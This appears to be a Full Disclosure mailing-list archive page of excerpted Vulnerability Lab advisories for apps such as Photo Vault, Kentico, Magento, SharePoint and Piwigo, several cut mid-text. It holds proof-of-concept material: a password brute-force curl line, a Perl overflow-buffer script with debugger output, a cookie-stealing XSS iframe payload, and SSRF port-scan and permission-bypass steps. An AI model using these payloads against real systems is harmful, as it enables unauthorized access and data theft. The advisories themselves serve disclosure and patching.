Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Photo Vault v1.2 iOS - Insecure Authentication Vulnerability

2018-01-19 Thread Vulnerability Lab 
Document Title:
===
Photo Vault v1.2 iOS - Insecure Authentication Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2110


Release Date:
=
2018-01-16


Vulnerability Laboratory ID (VL-ID):

2110


Common Vulnerability Scoring System:

4.8


Vulnerability Class:

Insecure Storage of Sensitive Information


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
https://itunes.apple.com/us/app/id1053383947


Abstract Advisory Information:
==
The vulnerability labortory core research team discovered a insecure 
authentication issue in the official 


Vulnerability Disclosure Timeline:
==
2018-01-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PhotoRange
Product: Photo Vault - Mobile (Web-Application) 1.2


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

An insecure configuration vulnerability has been discovered in the official iOS 
mobile Photo Vault v1.2 iOS web-application.

The vulnerability is located in the login mechanism and password request 
communication. In case of the activated wifi 
in the app it is possible to remotly access (http-server) the protected vault 
by a password. The password request is a 
simple less protected attempt to the login.html file with `_` to split between 
the password and file. There is no 
request limitation to block automated attacks. 

Attackers can perform fast enumerate the password by simply audits against the 
http basic authentication mechanism. 
Remote attackers can use an automated dictionary attack or compromise by manual 
basic http bruteforce attack via curl, 
nmap or http-brute. Attackers can fast gain unauthorized access the private 
vault over the activated wifi web-application 
in the same network. A second minor problem is that there is no https protocol 
activated for the wifi http-server 
communication in the network. Taken together, these two problems pose a 
significant risk to users and individuals,
based on sensitive information stored in the vault of the mobile iOS 
application.

The security risk of the insecure authentication configuration vulnerability is 
estimated as medium with a cvss count of 4.8. 
Exploitation of the vulnerability requires network access to connect to the 
web-server via wifi without user interaction. 
Successful exploitation of the vulnerability results in unauthorized access to 
private vault data or sensitive information.


Proof of Concept (PoC):
===
The security issue can be exploited by remote attackers without privileged user 
account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below.


PoC: 
http_code=$(curl -L -data password="passwdords.txt" "$url 
http://Localhost:9900/login.html__"; -w '%{http_code}' -o /root/fuzztime -s) 
#forensic


--- PoC Session Logs [GET] ---
GET http://localhost:9900/login.html
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 
Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Localhost:9900/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:20 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked
Note: Requests first the login page
-
GET http://localhost:9900/login.html__passwd1
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 
Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:9900/login.html
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:26 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked

Note: Access to vault of ios mobile application was cracked in a forensic 
access test within 15 minutes.


Reference(s):
http://localhost:9900/
http://localhost:9900/login.html
http://localhost:9900/login.html__


Security Risk:
==
The security risk of the vulnerability in the mobile vault application is 
eastimated as medium (CVSS 4.8).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warran

[FD] Zenario v7.6 CMS - SQL Injection Web Vulnerability

2018-01-15 Thread Vulnerability Lab 
A%228ovqgY47Ej1ExIotzyCRzQ%3D%3D%22%2C%22session%22%3Afalse%7D%7D]
   Response Header:
  Server[Apache/2.4.23 (Ubuntu)]
  X-Frame-Options[SAMEORIGIN]
  Content-Length[1862]
  Connection[Keep-Alive]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
http://zenario.localhost:8080/
http://zenario.localhost:8080/zenario/
http://zenario.localhost:8080/zenario/admin/
http://zenario.localhost:8080/zenario/admin/admin_boxes.ajax.php


Solution - Fix & Patch:
===
1. Escape the content of the name input field
2. Sanitize the parameter of the current_value
3. Disallow the usage of special chars in the current_value parameter
4. Use a prepared statement to prevent further exploitation


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
web-application is estimated as medium (cvss 5.7).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MagicSpam 2.0.13 - Insecure File Permission Vulnerability

2018-01-15 Thread Vulnerability Lab 
Document Title:
===
MagicSpam 2.0.13 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2113


Release Date:
=
2018-01-12


Vulnerability Laboratory ID (VL-ID):

2113


Common Vulnerability Scoring System:

2.8


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at 
the edge before it gets a chance to be filtered. 
There’s no need to change DNS or MX records. And your protection comes ready to 
go with complete logging, statistics, and custom controls.

(Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a insecure file 
permission vulnerability in the MagicSpam 2.0.13-1 plesk extension.



Vulnerability Disclosure Timeline:
==
2017-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

LinuxMagic
Product: MagicSpam - Plesk Extension 2.0.13-1


Exploitation Technique:
===
Remote


Severity Level:
===
Low


Technical Details & Description:

An insecure file permission access vulnerability has been discovered in the 
MagicSpam 2.0.13-1 plesk extension.
The vulnerability allows an attacker to access sensitive information like 
emails without permission or authentication.


Plesk panel features the freemium extension MagicSpam providing 
industry-leading spam protection technologies.
MagicSpam is keeping a detailed log of all e-mail messages processed under 
directory /var/log/magicspam/ in 
Ubuntu installations. A log file is created with the name mslog, with readable 
permissions for everyone, and rotated daily. 
The file will reveal the full list of mailboxes on the server (provided they 
received or sent at least one message in the past).

The security risk of the permission vulnerability is estimated as low with a 
common vulnerability scoring system count of 2.8. 
Successful exploitation of the file permission security vulnerability results 
in information disclosure of emails.


Proof of Concept (PoC):
===
The insecure file permission vulnerability can be exploited by remote attackers 
without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

$ id
uid=1002(marco) gid=1011(marco) groups=1011(marco)
$ cd /var/log/magicspam/
$ ls -l
-rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog
$ tail -n1 mslog
2018-01-10 11:51:26 magicspam-daemon[335]: HAM: 
mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=


Solution - Fix & Patch:
===
The security vulnerability can be resolved byan exclude of the emails in the 
list of the affected application log files.
Another solution could be to integration an authentication mechanism  for the 
log file of the magic spam web-application.


Security Risk:
==
The security risk of the insecure file permission vulnerability in the plesk 
extension magic spam is estimated as medium (CVSS 2.8).


Credits & Authors:
==
Marco Marsala [ma...@thenetworksolution.it] - 
https://www.vulnerability-lab.com/show.php?user=Marco+Marsala


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, inv

[FD] Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability

2018-01-13 Thread Vulnerability Lab 
d the xml config file to overwrite the ecx and eip registers.
The installation path and the iis website values are not exploitable, because 
of the active content restrictions of the process that drops an invalid 
argument exception to prevent.


PoC: Exploit Code (XML)

  
  
  
  
  
  
  
  
  
  



PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "A" x 3000;
open(MYFILE,'>>kentico_unicode_payload.txt');
print MYFILE $Buff;
close(MYFILE);
print "PoC (c) Vulnerability-Laboratory";


--- PoC Debug Session Logs [WinDBG] ---
(1522.21ec): Stack buffer overflow - code c409
eax= ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0
eip=41004100 esp= ebp= iopl=0 nv up ei pl nz na po nc
cs=001c  ss=0022  ds=0022  es=0022  fs=002c  gs= efl=
41414141 cc22
-
EXCEPTION_RECORD:   -- (.exr )
ExceptionAddress: 41414141
   ExceptionCode: c409 (Stack Buffer Overflow)
  ExceptionFlags: 0001
NumberParameters: 1
   Parameter[0]: 0002


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure file size and input character 
restriction like on the iis scheme website input.
Parse the full xml file on import and restrict the memory size on imports to 
prevent further buffer overflow attacks.


Security Risk:
==
The security risk of the local stack buffer overflow vulnerability in the 
kentico cms software is estimated as high. (CVSS 6.0)


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - SUBMISSION REVIEW TEAM
DOMAIN: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SonicWall GMS v8.1 - Filter Bypass & Persistent Vulnerability

2018-01-12 Thread Vulnerability Lab 
e 31th october 2016 and was finally 
resolved 2017 Q1 (v8.2). Please update your gms appliance web-application via 
service update or by manual interaction to prevent attacks.


Security Risk:
==
The security risk of the persistent input validation vulnerability and filter 
bypass issue is estimated as medium. (CVSS 4.1)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] 
[www.vulnerability-lab.com]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Magento Commerce - SSRF & XSPA Web Vulnerability

2018-01-12 Thread Vulnerability Lab 
Document Title:
===
Magento Commerce - SSRF & XSPA Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1631


Release Date:
=
2018-01-03


Vulnerability Laboratory ID (VL-ID):

1631


Common Vulnerability Scoring System:

4.7


Vulnerability Class:

Server Side Request Forgery


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Magento is an open source e-commerce web application that was launched on March 
31, 2008 under the name Bento. It was developed 
by Varien (now Magento, a division of eBay) with help from the programmers 
within the open source community but is now owned 
solely by eBay Inc. Magento was built using parts of the Zend Framework. It 
uses the entity-attribute-value (EAV) database model 
to store data. In November 2013, W3Techs estimated that Magento was used by 
0.9% of all websites.

Our team of security professionals works hard to keep Magento customer 
information secure. What`s equally important to protecting 
this data? Our security researchers and user community. If you find a site that 
isn`t following our policies, or a vulnerability 
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security  &  
http://magento.com/security )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered  SSRF/XSPA 
vulnerability in the official Magento Commerce online service web-application.


Vulnerability Disclosure Timeline:
==
2018-01-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Ebay Inc.
Product: Magento - Web Application Service 2015 Q4


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

SSRF/XSPA vulnerability has been discovered in the official Magento Commerce 
online service web-application.

The vulnerability allows remote attackers to perform malicious server-side 
requests to compromise the computer system or to 
gain unauthorized access to data or sensitive information. The XSPA & SSRF 
allows to use the process functionality of the 
magento engine as port scanner for the local or any random remote machine in 
the same network. The issue is the first documented 
xspa and ssrf issue in the magento service web-applications.

The security risk of the vulnerability is estimated as medium with a cvss 
(common vulnerability scoring system) count of 4.7.
Exploitation of the ssrf/xspa vulnerability requires a privileged 
web-application user account and no user interaction.
Successful exploitation of the issue can result in web-server or 
web-application compromise or unauthorized malicious interactions.


Proof of Concept (PoC):
===
Remote attackers are able to perform a local scan on the protected web-server 
firewall to magento.com and magentocommerce.com
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open http://magento.com/security-patch (Magento Shoplift Bug Tester)
2. Write in the website input  www.magento.com:22
3. Click to bug scan for the port 22
4. Successful reproduce of the issue!

--- Scan Log NMAP ---
Starting Nmap 6.00 at 2016-08-15 15:10 EEST
Initiating Ping Scan at 15:10
Scanning magento.com (66.211.190.110) [4 ports]
Completed Ping Scan at 15:10, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:10
Scanning magento.com (66.211.190.110) [100 ports]
Discovered open port 80/tcp on 66.211.190.110
Discovered open port 443/tcp on 66.211.190.110
Discovered open port 8443/tcp on 66.211.190.110
Discovered open port 8080/tcp on 66.211.190.110
Completed SYN Stealth Scan at 15:10, 2.38s elapsed (100 total ports)
......

Note: SSRF/XSPA allows to scan the local host to discovered the open service 
ports
(References: https://cwe.mitre.org/data/definitions/918.html)


Solution - Fix & Patch:
===
The vulnerability has been resolved as bug bounty issue by the magento security 
team in 2017.


Security Risk:
==
The security risk of the ssrf/xspa web vulnerability that allows to scan the 
infrastructure behind the firewall is estimated as medium (CVSS 4.7).


Credits & Authors:
==
Vulnerability Laboratory [Core Research Team] (resea...@vulnerability-lab.com) 
[www.vulnerability-lab.com]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab

[FD] Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability

2018-01-12 Thread Vulnerability Lab 
Document Title:
===
Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2111


Release Date:
=
2018-01-07


Vulnerability Laboratory ID (VL-ID):

2111


Common Vulnerability Scoring System:

4.8


Vulnerability Class:

Filter or Protection Mechanism Bypass


Current Estimated Price:

1.000€ - 2.000€


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a permission 
bypass vulnerability in the Microsoft Sharepoint online service web-application.


Vulnerability Disclosure Timeline:
==
2018-01-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Microsoft Corporation
Product: Sharepoint Online Service - (Web-Application) 2013


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

A permission level bypass web vulnerability has been identified in the 
microsoft sharePoint 2013 online service 
web-application & maybe prior versions. The security vulnerability allows 
attackers to open or view restricted 
items in the site or library. An authenticated user can bypass `Limited Access` 
permissions to browse a page or 
library to access a specific content item that was restricted.


Proof of Concept (PoC):
===
POC 1:
1. Search for specific words inside web & mobile sharepoint search box: 
`password` `pass` `user` `domainuser` `name | lastname` ...

[~] web search: http://site/BSearch/results.aspx
[~] mobie search:   http://site/_layouts/mobile/MobileResults.aspx

example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA1377";
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB

2. The page shown some of sharepoint's search results like restricted specific 
item, site, library urls etc
3. so click at the urls to access|viwe|read site page and other restricted 
library and items


POC 2:
After capturing packets between our system and the sharepoint site (use fiddler 
or burpsiute, wireshark ...) 
We have access to items, list, pages, sites urls like as follows:

http://site/IT/Lists/List70/AllItems.aspx

Access to restricted items & lists by make /LIST#/ urls 

Example:
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx


Security Risk:
==
The security risk of the bypass vulnerability in the microsoft sharepoint 2013 
application is estimated as medium (CVSS 4.8).


Credits & Authors:
==
Behnam Vanda [beni.va...@gmail.com] [redhathackers] - 
https://www.vulnerability-lab.com/show.php?user=Behnam+Vanda


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/

[FD] Magento Connect T1 - (Claim) Persistent Vulnerability

2018-01-12 Thread Vulnerability Lab 
.magentocommerce.com/magento-connect/claim/claim/new/]
  Cookie
  X-Forwarded-For[8.8.8.8]
  Connection[keep-alive]
   Post Data:
  
claim%5Bclaimed_extension_url%5D[%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3C%2Fiframe%3E]
  claim%5Boriginal_extension_url%5D[]
  claim%5Bdescription%5D[]
  claim%5Bdigital_signature%5D[]
   Response Headers:
  Server[nginx]
  Content-Type[text/html; charset=UTF-8]
  Connection[keep-alive]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
  Set-Cookie[frontend=4edl2ftb4c6qoe11lieojciaj7; path=/magento-connect/; 
domain=www.magentocommerce.com]
  Content-Length[71413]


Solution - Fix & Patch:
===
The security vulnerability is marked as fixed within 2017 Q1 - 2017 Q4 by the 
magento developer team.


Security Risk:
==
The security rsik of the persistent input validation web vulnerability is 
estimated as medium (CVSS 3.8).


Credits & Authors:
==
Vulnerability-Lab [ad...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities

2018-01-12 Thread Vulnerability Lab 
ile or directory in 
/home/x/public_html/x/piwigo/admin/languages.php on line 48
Warning: include(): Failed opening './admin/languages_>"<[MALICIOUS PAYLOAD 
EXECUTION!]>.php' for inclusion 
(include_path='.:/usr/share/php:/usr/share/pear') in 
/home/x/public_html/x/piwigo/admin/languages.php on line 48
http://www.w3.org/TR/html4/strict.dtd";>




Just another Piwigo gallery :: Piwigo Administration



Vulnerable Source: to (form)

<<><[MALICIOUS PAYLOAD EXECUTION!]> ">
  Update in 
progress...
<<><[MALICIOUS 
PAYLOAD EXECUTION!]> ">



Vulnerable Source: installstatus (error exception)

  

  
Plugins 
list
  
  
Check for 
updates
  
  
Other plugins 
available
  


  

  An error occured during the files (<[MALICIOUS PAYLOAD EXECUTION!]>) 
extraction.
  Please check "plugins" folder and sub-folders permissions 
(CHMOD).

  


Reference(s):
http://piwigo.localhost:8080/
http://piwigo.localhost:8080/piwigo/
http://piwigo.localhost:8080/piwigo/admin.php


Solution - Fix & Patch:
===
The xss web vulnerabilities can be patched by a secure restriction to the 
parameter inputs in GET method requests.
Sanitize the vulnerable parameters and disallow the usage of special chars to 
prevent further script code injection attacks. 
Parse the output locations in the status messages or exception to resolve the 
client-side vulnerabilities.
Escape the conetnts to deliver in a secure format.


Security Risk:
==
The security risk of the client-side cross site scripting web vulnerabilities 
in the content management system are estimated as medium. (CVSS 3.4)


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
